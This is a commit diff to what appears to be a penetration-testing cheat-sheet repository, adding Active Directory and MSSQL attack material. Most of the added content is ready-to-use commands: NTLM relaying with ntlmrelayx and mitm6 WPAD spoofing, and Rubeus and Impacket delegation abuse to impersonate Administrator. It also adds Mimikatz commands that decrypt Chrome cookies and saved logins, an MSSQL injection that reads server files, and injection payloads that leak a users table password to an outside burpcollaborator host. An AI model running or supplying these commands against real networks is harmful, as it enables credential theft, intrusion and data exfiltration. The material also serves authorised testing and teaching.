Relay + MSSQL Read File
parent
f6b9d63bf8
commit
0443babe35
|
@ -50,7 +50,7 @@
|
|||
- [Using impacket](#using-impacket)
|
||||
- [Using Rubeus](#using-rubeus)
|
||||
- [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
- [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
||||
- [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
|
||||
|
@ -1436,7 +1436,7 @@ Then crack the hash with `hashcat`
|
|||
hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
```
|
||||
|
||||
### NTLMv2 hashes relaying
|
||||
### Man-in-the-Middle attacks & relaying
|
||||
|
||||
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||
|
||||
|
@ -1473,14 +1473,13 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
|||
HTTP = Off # Turn this off
|
||||
```
|
||||
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list.
|
||||
```powershell
|
||||
ntlmrelayx.py -tf targets.txt
|
||||
```
|
||||
3. Run `python Responder.py -I <interface_card>`
|
||||
4. Use a relay tool such as `ntlmrelayx` or `MultiRelay`
|
||||
- `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list.
|
||||
- `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
|
||||
```powershell
|
||||
$ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
|
||||
$ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support
|
||||
[*] Servers started, waiting for connections
|
||||
Type help for list of commands
|
||||
ntlmrelayx> socks
|
||||
|
@ -1489,12 +1488,18 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
|||
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
|
||||
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
|
||||
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
|
||||
|
||||
$ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
|
||||
|
||||
# You might need to select a target with "-t"
|
||||
impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
|
||||
impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
|
||||
|
||||
# the socks proxy can then be used with your Impacket tools or CrackMapExec
|
||||
$ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth
|
||||
$ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
**Mitigations**:
|
||||
|
||||
* Disable LLMNR via group policy
|
||||
```powershell
|
||||
|
@ -1510,15 +1515,21 @@ Mitigations:
|
|||
Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
|
||||
|
||||
```powershell
|
||||
cme smb $hosts --gen-relay-list relay.txt
|
||||
crackmapexec smb $hosts --gen-relay-list relay.txt
|
||||
|
||||
# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
|
||||
# -d is the domain name that we filter our request on - the attacked domain
|
||||
# -i is the interface we have mitm6 listen on for events
|
||||
mitm6 -i eth0 -d $domain
|
||||
|
||||
# spoofing WPAD and relaying NTLM credentials
|
||||
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
|
||||
or
|
||||
ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
|
||||
impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt
|
||||
impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug
|
||||
|
||||
# -ip is the interface you want the relay to run on
|
||||
# -wh is for WPAD host, specifying your wpad file to serve
|
||||
# -t is the target where you want to relay to.
|
||||
impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
|
||||
```
|
||||
|
||||
#### Drop the MIC
|
||||
|
@ -1984,8 +1995,10 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
|
|||
|
||||
# Find the service
|
||||
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
# Exploit with Impacket
|
||||
#### Exploit with Impacket
|
||||
```ps1
|
||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||
|
||||
|
@ -1994,14 +2007,28 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
|||
[*] Requesting S4U2self
|
||||
[*] Requesting S4U2Proxy
|
||||
[*] Saving ticket in Administrator.ccache
|
||||
```
|
||||
|
||||
# Exploit with Rubeus
|
||||
#### Exploit with Rubeus
|
||||
```ps1
|
||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||
$ dir \\dc.domain.com\c$
|
||||
```
|
||||
|
||||
#### Impersonate a domain user on a resource
|
||||
|
||||
Require:
|
||||
* SYSTEM level privileges on a machine configured with constrained delegation
|
||||
|
||||
```ps1
|
||||
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
|
||||
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
|
||||
PS> $idToImpersonate.Impersonate()
|
||||
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
|
||||
PS> ls \\dc01.offense.local\c$
|
||||
```
|
||||
|
||||
### Kerberos Resource Based Constrained Delegation
|
||||
|
||||
|
|
|
@ -11,6 +11,9 @@
|
|||
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
|
||||
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
|
||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||
* [Vault](#vault)
|
||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
||||
* [References](#references)
|
||||
|
@ -178,8 +181,6 @@ net start sesshijack
|
|||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## Mimikatz - Credential Manager & DPAPI
|
||||
|
||||
```powershell
|
||||
|
@ -196,6 +197,17 @@ $ mimikatz !sekurlsa::dpapi
|
|||
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
||||
```
|
||||
|
||||
### Chrome Cookies & Credential
|
||||
|
||||
```powershell
|
||||
# Saved Cookies
|
||||
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
|
||||
dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b
|
||||
|
||||
# Saved Credential in Chrome
|
||||
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
|
||||
```
|
||||
|
||||
### Task Scheduled credentials
|
||||
|
||||
```powershell
|
||||
|
|
|
@ -14,6 +14,7 @@
|
|||
* [MSSQL Blind Based](#mssql-blind-based)
|
||||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||
* [MSSQL Read file](#mssql-read-file)
|
||||
* [MSSQL Command execution](#mssql-command-execution)
|
||||
* [MSSQL Out of band](#mssql-out-of-band)
|
||||
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
|
||||
|
@ -147,6 +148,16 @@ Use a semi-colon ";" to add another query
|
|||
ProductID=1; DROP members--
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Read file
|
||||
|
||||
**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
|
||||
|
||||
```sql
|
||||
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Command execution
|
||||
|
||||
```sql
|
||||
|
@ -196,7 +207,12 @@ GO
|
|||
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
|
||||
|
||||
```powershell
|
||||
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
|
||||
# Permissions: Requires VIEW SERVER STATE permission on the server.
|
||||
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
|
||||
|
||||
# Permissions: Requires the CONTROL SERVER permission.
|
||||
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
|
||||
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
|
||||
```
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue